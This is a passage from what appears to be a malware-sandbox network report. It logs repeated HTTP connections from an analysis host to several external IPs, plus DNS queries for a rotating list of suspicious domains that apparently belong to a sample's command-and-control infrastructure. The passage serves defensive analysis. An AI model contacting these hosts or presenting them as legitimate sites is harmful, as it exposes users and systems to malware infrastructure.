                Aug 19, 2024 04:28:23.443567038 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:24.412590981 CEST6189480192.168.2.423.251.54.212
                Aug 19, 2024 04:28:24.417785883 CEST806189423.251.54.212192.168.2.4
                Aug 19, 2024 04:28:24.417855978 CEST6189480192.168.2.423.251.54.212
                Aug 19, 2024 04:28:24.420876026 CEST6189480192.168.2.423.251.54.212
                Aug 19, 2024 04:28:24.425764084 CEST806189423.251.54.212192.168.2.4
                Aug 19, 2024 04:28:38.209585905 CEST806189123.251.54.212192.168.2.4
                Aug 19, 2024 04:28:38.209654093 CEST6189180192.168.2.423.251.54.212
                Aug 19, 2024 04:28:40.710345030 CEST806189223.251.54.212192.168.2.4
                Aug 19, 2024 04:28:40.710495949 CEST6189280192.168.2.423.251.54.212
                Aug 19, 2024 04:28:43.283704996 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:43.283853054 CEST6189380192.168.2.423.251.54.212
                Aug 19, 2024 04:28:45.803622961 CEST806189423.251.54.212192.168.2.4
                Aug 19, 2024 04:28:45.803747892 CEST6189480192.168.2.423.251.54.212
                Aug 19, 2024 04:28:45.804814100 CEST6189480192.168.2.423.251.54.212
                Aug 19, 2024 04:28:45.809722900 CEST806189423.251.54.212192.168.2.4
                Aug 19, 2024 04:28:50.849291086 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:50.854239941 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:50.858470917 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:50.861352921 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:50.866235971 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482146025 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482197046 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482266903 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482297897 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.482300043 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482333899 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482366085 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482373953 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.482398987 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482435942 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482466936 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482487917 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.482487917 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.482501984 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482765913 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.487428904 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.487462997 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.487498045 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.487557888 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.487857103 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.487952948 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.572577000 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.572618008 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.572654963 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.572689056 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.572760105 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:52.361337900 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.380055904 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.385113955 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.388029099 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.391957045 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.396830082 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995450974 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995497942 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995533943 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995546103 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.995568037 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995600939 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995613098 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.995634079 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995666981 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995682955 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.995719910 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995752096 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995757103 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.995785952 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995826960 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:54.000701904 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.000735998 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.000771046 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.000780106 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:54.048733950 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:54.082446098 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.082482100 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.082518101 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.082525015 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:54.082561016 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:54.894254923 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:55.911107063 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:55.916208982 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.916316032 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:55.918767929 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:55.925955057 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.925985098 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926011086 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926253080 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926280022 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926357985 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926449060 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926480055 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926506996 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555280924 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555306911 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555325031 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555344105 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555372000 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555387974 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555406094 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555419922 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555435896 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555453062 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555568933 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.555568933 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.555569887 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.555569887 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.555569887 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.560779095 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.560803890 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.560833931 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.560869932 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.611258030 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.644129038 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.644171000 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.644224882 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.650196075 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:57.423825979 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:58.443744898 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:58.449012995 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:58.449098110 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:58.451304913 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:58.456258059 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083702087 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083745003 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083781004 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083815098 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083848000 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083880901 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083914042 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083930969 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.083949089 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083981037 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083997011 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.084016085 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.084019899 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.084223032 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.088929892 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.088963985 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.089019060 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.089052916 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.089097977 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.089193106 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.171840906 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.171874046 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.171911001 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.172020912 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.172020912 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.174406052 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.179238081 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:29:04.237011909 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:04.241884947 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.241955996 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:04.244107962 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:04.248965979 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.930221081 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.930280924 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.930332899 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.930341005 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:04.933170080 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.933219910 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:04.933331013 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.933378935 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:05.754650116 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:06.771672010 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:06.778660059 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:06.778743029 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:06.780891895 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:06.785844088 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.504302025 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.504343987 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.504379034 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.504399061 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:07.507680893 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.507728100 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.507742882 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:07.507774115 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:08.283960104 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:09.325824022 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:09.331140041 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.331212044 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:09.334495068 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:09.339524031 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339553118 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339581013 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339607000 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339654922 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339679956 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339706898 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339752913 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339777946 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.035621881 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.035643101 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.035659075 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.035671949 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.035756111 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:10.035830021 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:10.041949034 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.042282104 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.042462111 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:10.845726967 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:11.867942095 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:11.873071909 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:11.873204947 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:11.877254009 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:11.882077932 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.619221926 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.619275093 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.619313002 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.619340897 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:12.624816895 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.624936104 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.625051022 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:12.627655029 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:12.632534981 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:17.710206032 CEST6190380192.168.2.491.195.240.19
                Aug 19, 2024 04:29:17.715148926 CEST806190391.195.240.19192.168.2.4
                Aug 19, 2024 04:29:17.719985962 CEST6190380192.168.2.491.195.240.19
                Aug 19, 2024 04:29:17.719985962 CEST6190380192.168.2.491.195.240.19
                Aug 19, 2024 04:29:17.724987984 CEST806190391.195.240.19192.168.2.4
                Aug 19, 2024 04:29:18.367764950 CEST806190391.195.240.19192.168.2.4
                Aug 19, 2024 04:29:18.367917061 CEST806190391.195.240.19192.168.2.4
                Aug 19, 2024 04:29:18.369749069 CEST6190380192.168.2.491.195.240.19
                Aug 19, 2024 04:29:19.236376047 CEST6190380192.168.2.491.195.240.19
                Aug 19, 2024 04:29:20.255986929 CEST6190480192.168.2.491.195.240.19
                Aug 19, 2024 04:29:20.260992050 CEST806190491.195.240.19192.168.2.4
                Aug 19, 2024 04:29:20.264329910 CEST6190480192.168.2.491.195.240.19
                Aug 19, 2024 04:29:20.267699957 CEST6190480192.168.2.491.195.240.19
                Aug 19, 2024 04:29:20.272589922 CEST806190491.195.240.19192.168.2.4
                Aug 19, 2024 04:29:20.919342041 CEST806190491.195.240.19192.168.2.4
                Aug 19, 2024 04:29:20.919696093 CEST806190491.195.240.19192.168.2.4
                Aug 19, 2024 04:29:20.919755936 CEST6190480192.168.2.491.195.240.19
                Aug 19, 2024 04:29:21.767734051 CEST6190480192.168.2.491.195.240.19
                Aug 19, 2024 04:29:22.796919107 CEST6190580192.168.2.491.195.240.19
                Aug 19, 2024 04:29:22.801871061 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.801949024 CEST6190580192.168.2.491.195.240.19
                Aug 19, 2024 04:29:22.832972050 CEST6190580192.168.2.491.195.240.19
                Aug 19, 2024 04:29:22.837878942 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838073969 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838102102 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838150978 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838176966 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838263988 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838291883 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838318110 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838349104 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:23.470873117 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:23.565105915 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:23.565166950 CEST6190580192.168.2.491.195.240.19
                Aug 19, 2024 04:29:24.345724106 CEST6190580192.168.2.491.195.240.19
                Aug 19, 2024 04:29:25.364779949 CEST6190680192.168.2.491.195.240.19
                Aug 19, 2024 04:29:25.371200085 CEST806190691.195.240.19192.168.2.4
                Aug 19, 2024 04:29:25.371283054 CEST6190680192.168.2.491.195.240.19
                Aug 19, 2024 04:29:25.373101950 CEST6190680192.168.2.491.195.240.19
                Aug 19, 2024 04:29:25.378011942 CEST806190691.195.240.19192.168.2.4
                Aug 19, 2024 04:29:26.072212934 CEST806190691.195.240.19192.168.2.4
                Aug 19, 2024 04:29:26.072257996 CEST806190691.195.240.19192.168.2.4
                Aug 19, 2024 04:29:26.074038029 CEST6190680192.168.2.491.195.240.19
                Aug 19, 2024 04:29:26.085258961 CEST6190680192.168.2.491.195.240.19
                Aug 19, 2024 04:29:26.090238094 CEST806190691.195.240.19192.168.2.4
                Aug 19, 2024 04:29:39.178483009 CEST6190780192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:39.183495998 CEST8061907104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:39.183558941 CEST6190780192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:39.185808897 CEST6190780192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:39.190648079 CEST8061907104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:40.691998005 CEST6190780192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:40.697284937 CEST8061907104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:40.700088978 CEST6190780192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:41.708862066 CEST6190880192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:41.714025021 CEST8061908104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:41.714107037 CEST6190880192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:41.716414928 CEST6190880192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:41.721265078 CEST8061908104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:43.220807076 CEST6190880192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:43.227272987 CEST8061908104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:43.227339983 CEST6190880192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:44.242032051 CEST6190980192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:44.247231007 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.250142097 CEST6190980192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:44.254338980 CEST6190980192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:44.259418011 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259479046 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259506941 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259555101 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259582996 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259608030 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259634018 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259680033 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259706020 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:45.770188093 CEST6190980192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:45.775615931 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:45.778266907 CEST6190980192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:46.786793947 CEST6191080192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:46.791733027 CEST8061910104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:46.791800976 CEST6191080192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:46.794259071 CEST6191080192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:46.799118042 CEST8061910104.21.45.56192.168.2.4

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 19, 2024 04:26:29.468120098 CEST5804453192.168.2.41.1.1.1
                Aug 19, 2024 04:26:29.495522022 CEST53580441.1.1.1192.168.2.4
                Aug 19, 2024 04:26:45.256534100 CEST5756053192.168.2.41.1.1.1
                Aug 19, 2024 04:26:45.271867037 CEST53575601.1.1.1192.168.2.4
                Aug 19, 2024 04:26:58.634886026 CEST5851653192.168.2.41.1.1.1
                Aug 19, 2024 04:26:58.643712997 CEST53585161.1.1.1192.168.2.4
                Aug 19, 2024 04:27:06.744618893 CEST5741453192.168.2.41.1.1.1
                Aug 19, 2024 04:27:06.754542112 CEST53574141.1.1.1192.168.2.4
                Aug 19, 2024 04:27:14.896873951 CEST6303153192.168.2.41.1.1.1
                Aug 19, 2024 04:27:15.140780926 CEST53630311.1.1.1192.168.2.4
                Aug 19, 2024 04:27:30.005403996 CEST5566853192.168.2.41.1.1.1
                Aug 19, 2024 04:27:30.014386892 CEST53556681.1.1.1192.168.2.4
                Aug 19, 2024 04:27:38.068952084 CEST6312953192.168.2.41.1.1.1
                Aug 19, 2024 04:27:39.067810059 CEST6312953192.168.2.41.1.1.1
                Aug 19, 2024 04:27:39.074470997 CEST53631291.1.1.1192.168.2.4
                Aug 19, 2024 04:27:40.632994890 CEST53631291.1.1.1192.168.2.4
                Aug 19, 2024 04:28:02.865473032 CEST5246253192.168.2.41.1.1.1
                Aug 19, 2024 04:28:02.954099894 CEST53524621.1.1.1192.168.2.4
                Aug 19, 2024 04:28:16.225584984 CEST5420653192.168.2.41.1.1.1
                Aug 19, 2024 04:28:16.792520046 CEST53542061.1.1.1192.168.2.4
                Aug 19, 2024 04:28:50.818933964 CEST6257653192.168.2.41.1.1.1
                Aug 19, 2024 04:28:50.844403028 CEST53625761.1.1.1192.168.2.4
                Aug 19, 2024 04:29:04.193742990 CEST5431853192.168.2.41.1.1.1
                Aug 19, 2024 04:29:04.234004974 CEST53543181.1.1.1192.168.2.4
                Aug 19, 2024 04:29:17.645778894 CEST5948953192.168.2.41.1.1.1
                Aug 19, 2024 04:29:17.704349995 CEST53594891.1.1.1192.168.2.4
                Aug 19, 2024 04:29:31.099773884 CEST6433553192.168.2.41.1.1.1
                Aug 19, 2024 04:29:31.108858109 CEST53643351.1.1.1192.168.2.4
                Aug 19, 2024 04:29:39.163027048 CEST5624753192.168.2.41.1.1.1
                Aug 19, 2024 04:29:39.175703049 CEST53562471.1.1.1192.168.2.4

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Aug 19, 2024 04:26:29.468120098 CEST192.168.2.41.1.1.10x23e9Standard query (0)www.hprlz.czA (IP address)IN (0x0001)false
                Aug 19, 2024 04:26:45.256534100 CEST192.168.2.41.1.1.10x147aStandard query (0)www.catherineviskadi.comA (IP address)IN (0x0001)false
                Aug 19, 2024 04:26:58.634886026 CEST192.168.2.41.1.1.10x8947Standard query (0)www.hatercoin.onlineA (IP address)IN (0x0001)false
                Aug 19, 2024 04:27:06.744618893 CEST192.168.2.41.1.1.10x3d79Standard query (0)www.fourgrouw.cfdA (IP address)IN (0x0001)false
                Aug 19, 2024 04:27:14.896873951 CEST192.168.2.41.1.1.10xc8b8Standard query (0)www.bfiworkerscomp.comA (IP address)IN (0x0001)false
                Aug 19, 2024 04:27:30.005403996 CEST192.168.2.41.1.1.10x3027Standard query (0)www.tinmapco.comA (IP address)IN (0x0001)false
                Aug 19, 2024 04:27:38.068952084 CEST192.168.2.41.1.1.10xc23eStandard query (0)www.xn--fhq1c541j0zr.comA (IP address)IN (0x0001)false
                Aug 19, 2024 04:27:39.067810059 CEST192.168.2.41.1.1.10xc23eStandard query (0)www.xn--fhq1c541j0zr.comA (IP address)IN (0x0001)false
                Aug 19, 2024 04:28:02.865473032 CEST192.168.2.41.1.1.10x6b15Standard query (0)www.xn--matfrmn-jxa4m.seA (IP address)IN (0x0001)false
                Aug 19, 2024 04:28:16.225584984 CEST192.168.2.41.1.1.10x9fdfStandard query (0)www.anuts.topA (IP address)IN (0x0001)false
                Aug 19, 2024 04:28:50.818933964 CEST192.168.2.41.1.1.10xf202Standard query (0)www.telwisey.infoA (IP address)IN (0x0001)false
                Aug 19, 2024 04:29:04.193742990 CEST192.168.2.41.1.1.10x33ffStandard query (0)www.sandranoll.comA (IP address)IN (0x0001)false
                Aug 19, 2024 04:29:17.645778894 CEST192.168.2.41.1.1.10xbf8eStandard query (0)www.gipsytroya.comA (IP address)IN (0x0001)false
                Aug 19, 2024 04:29:31.099773884 CEST192.168.2.41.1.1.10xcafaStandard query (0)www.helpers-lion.onlineA (IP address)IN (0x0001)false
                Aug 19, 2024 04:29:39.163027048 CEST192.168.2.41.1.1.10x93b1Standard query (0)www.dmtxwuatbz.ccA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Aug 19, 2024 04:26:29.495522022 CEST1.1.1.1192.168.2.40x23e9No error (0)www.hprlz.cz5.44.111.162A (IP address)IN (0x0001)false
